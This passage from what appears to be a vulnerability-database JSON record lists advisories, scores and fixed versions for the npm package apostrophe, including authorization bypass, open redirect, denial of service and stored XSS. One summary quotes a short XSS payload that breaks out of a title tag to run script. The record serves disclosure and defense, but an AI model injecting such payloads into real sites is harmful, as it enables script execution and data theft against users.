"scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-16T13:40:14Z/" } ], "url": "https://github.com/apostrophecms/apostrophe/commit/6c2b548dec2e3f7a82e8e16736603f4cd17525aa" }, { "reference_url": "https://github.com/advisories/GHSA-c276-fj82-f2pq", "reference_id": "GHSA-c276-fj82-f2pq", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-c276-fj82-f2pq" }, { "reference_url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-c276-fj82-f2pq", "reference_id": "GHSA-c276-fj82-f2pq", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-16T13:40:14Z/" } ], "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-c276-fj82-f2pq" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373705?format=api", "purl": "pkg:npm/apostrophe@4.29.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-9jxc-az1j-3qex" }, { "vulnerability": "VCID-jkpm-13y1-5yfj" }, { "vulnerability": "VCID-wscg-efgt-e7bw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.29.0" } ], "aliases": [ "CVE-2026-39857", "GHSA-c276-fj82-f2pq" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pt6d-cm84-e7c4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/78012?format=api", "vulnerability_id": "VCID-t3jk-9ttu-nfgt", "summary": "ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain an authorization bypass vulnerability in the getRestQuery method of the @apostrophecms/piece-type module, where the method checks whether a MongoDB projection has already been set before applying the admin-configured publicApiProjection. An unauthenticated attacker can supply a project query parameter in the REST API request, which is processed by applyBuildersSafely before the permission check, pre-populating the projection state and causing the publicApiProjection to be skipped entirely. This allows disclosure of any field on publicly queryable documents that the administrator explicitly restricted from the public API, such as internal notes, draft content, or metadata. Exploitation is trivial, requiring only appending query parameters to a public URL with no authentication. This issue has been fixed in version 4.29.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33888", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0011", "scoring_system": "epss", "scoring_elements": "0.28995", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.0011", "scoring_system": "epss", "scoring_elements": "0.29199", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33888" }, { "reference_url": "https://github.com/apostrophecms/apostrophe", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apostrophecms/apostrophe" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33888", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33888" }, { "reference_url": "https://github.com/apostrophecms/apostrophe/commit/00d472804bb622df36a761b6f2cf2b33b2d4ce80", "reference_id": "00d472804bb622df36a761b6f2cf2b33b2d4ce80", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-15T20:03:13Z/" } ], "url": "https://github.com/apostrophecms/apostrophe/commit/00d472804bb622df36a761b6f2cf2b33b2d4ce80" }, { "reference_url": "https://github.com/apostrophecms/apostrophe/commit/6c2b548dec2e3f7a82e8e16736603f4cd17525aa", "reference_id": "6c2b548dec2e3f7a82e8e16736603f4cd17525aa", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-15T20:03:13Z/" } ], "url": "https://github.com/apostrophecms/apostrophe/commit/6c2b548dec2e3f7a82e8e16736603f4cd17525aa" }, { "reference_url": "https://github.com/advisories/GHSA-xhq9-58fw-859p", "reference_id": "GHSA-xhq9-58fw-859p", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xhq9-58fw-859p" }, { "reference_url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-xhq9-58fw-859p", "reference_id": "GHSA-xhq9-58fw-859p", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-15T20:03:13Z/" } ], "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-xhq9-58fw-859p" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373705?format=api", "purl": "pkg:npm/apostrophe@4.29.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-9jxc-az1j-3qex" }, { "vulnerability": "VCID-jkpm-13y1-5yfj" }, { "vulnerability": "VCID-wscg-efgt-e7bw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.29.0" } ], "aliases": [ "CVE-2026-33888", "GHSA-xhq9-58fw-859p" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-t3jk-9ttu-nfgt" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/205887?format=api", "vulnerability_id": "VCID-tw2u-1uam-4bef", "summary": "Denial of Service in apostrophe", "references": [ { "reference_url": "https://www.npmjs.com/advisories/1183", "reference_id": "", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.npmjs.com/advisories/1183" }, { "reference_url": "https://github.com/advisories/GHSA-pv6r-vchh-cxg9", "reference_id": "GHSA-pv6r-vchh-cxg9", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-pv6r-vchh-cxg9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/17495?format=api", "purl": "pkg:npm/apostrophe@2.97.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1nxf-g588-c3ey" }, { "vulnerability": "VCID-56a7-tu1w-fua8" }, { "vulnerability": "VCID-7fb7-sbm9-u7fa" }, { "vulnerability": "VCID-9jxc-az1j-3qex" }, { "vulnerability": "VCID-h84b-fbew-d3a3" }, { "vulnerability": "VCID-jkpm-13y1-5yfj" }, { "vulnerability": "VCID-pt6d-cm84-e7c4" }, { "vulnerability": "VCID-qa7n-2hgf-xbbn" }, { "vulnerability": "VCID-t3jk-9ttu-nfgt" }, { "vulnerability": "VCID-xez4-ydba-nfdb" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.97.1" } ], "aliases": [ "GHSA-pv6r-vchh-cxg9", "GMS-2020-705" ], "risk_score": 1.4, "exploitability": "0.5", "weighted_severity": "2.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tw2u-1uam-4bef" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/205725?format=api", "vulnerability_id": "VCID-wr3t-pzuf-5fb6", "summary": "Open Redirect in apostrophe", "references": [ { "reference_url": "https://github.com/apostrophecms/apostrophe", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apostrophecms/apostrophe" }, { "reference_url": "https://github.com/apostrophecms/apostrophe/commit/1eba144bb82bd43dab72ce36cfbd593361b6d9b7", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apostrophecms/apostrophe/commit/1eba144bb82bd43dab72ce36cfbd593361b6d9b7" }, { "reference_url": "https://snyk.io/vuln/SNYK-JS-APOSTROPHE-451089", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://snyk.io/vuln/SNYK-JS-APOSTROPHE-451089" }, { "reference_url": "https://www.npmjs.com/advisories/1029", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.npmjs.com/advisories/1029" }, { "reference_url": "https://github.com/advisories/GHSA-h97g-4mx7-5p2p", "reference_id": "GHSA-h97g-4mx7-5p2p", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-h97g-4mx7-5p2p" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/17372?format=api", "purl": "pkg:npm/apostrophe@2.92.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1nxf-g588-c3ey" }, { "vulnerability": "VCID-56a7-tu1w-fua8" }, { "vulnerability": "VCID-7fb7-sbm9-u7fa" }, { "vulnerability": "VCID-9jxc-az1j-3qex" }, { "vulnerability": "VCID-h84b-fbew-d3a3" }, { "vulnerability": "VCID-jkpm-13y1-5yfj" }, { "vulnerability": "VCID-pt6d-cm84-e7c4" }, { "vulnerability": "VCID-qa7n-2hgf-xbbn" }, { "vulnerability": "VCID-t3jk-9ttu-nfgt" }, { "vulnerability": "VCID-tw2u-1uam-4bef" }, { "vulnerability": "VCID-xez4-ydba-nfdb" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.92.0" } ], "aliases": [ "GHSA-h97g-4mx7-5p2p", "GMS-2020-704" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wr3t-pzuf-5fb6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71682?format=api", "vulnerability_id": "VCID-xez4-ydba-nfdb", "summary": "ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain a stored cross-site scripting vulnerability in SEO-related fields (SEO Title and Meta Description), where user-controlled input is rendered without proper output encoding into HTML contexts including <title> tags, <meta> attributes, and JSON-LD structured data. An attacker can inject a payload such as \"></title><script>alert(1)</script> to break out of the intended HTML context and execute arbitrary JavaScript in the browser of any authenticated user who views the affected page. This can be leveraged to perform authenticated API requests, access sensitive data such as usernames, email addresses, and roles via internal APIs, and exfiltrate it to an attacker-controlled server. This issue has been fixed in version 4.29.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35569", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00037", "scoring_system": "epss", "scoring_elements": "0.11528", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00037", "scoring_system": "epss", "scoring_elements": "0.1145", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35569" }, { "reference_url": "https://github.com/apostrophecms/apostrophe", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apostrophecms/apostrophe" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35569", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35569" }, { "reference_url": "https://github.com/apostrophecms/apostrophe/commit/0e57dd07a56ae1ba1e3af646ba026db4d0ab5bb3", "reference_id": "0e57dd07a56ae1ba1e3af646ba026db4d0ab5bb3", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-16T14:14:28Z/" } ], "url": "https://github.com/apostrophecms/apostrophe/commit/0e57dd07a56ae1ba1e3af646ba026db4d0ab5bb3" }, { "reference_url": "https://github.com/Chittu13/cve-research/tree/main/CVE-2026-35569", "reference_id": "CVE-2026-35569", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-16T14:14:28Z/" } ], "url": "https://github.com/Chittu13/cve-research/tree/main/CVE-2026-35569" }, { "reference_url": "https://github.com/advisories/GHSA-855c-r2vq-c292", "reference_id": "GHSA-855c-r2vq-c292", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-855c-r2vq-c292" }, { "reference_url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-855c-r2vq-c292", "reference_id": "GHSA-855c-r2vq-c292", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-16T14:14:28Z/" } ], "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-855c-r2vq-c292" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373705?format=api", "purl": "pkg:npm/apostrophe@4.29.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-9jxc-az1j-3qex" }, { "vulnerability": "VCID-jkpm-13y1-5yfj" }, { "vulnerability": "VCID-wscg-efgt-e7bw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.29.0" } ], "aliases": [ "CVE-2026-35569", "GHSA-855c-r2vq-c292" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xez4-ydba-nfdb" } ], "fixing_vulnerabilities": [], "risk_score": "4.0", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.348" }
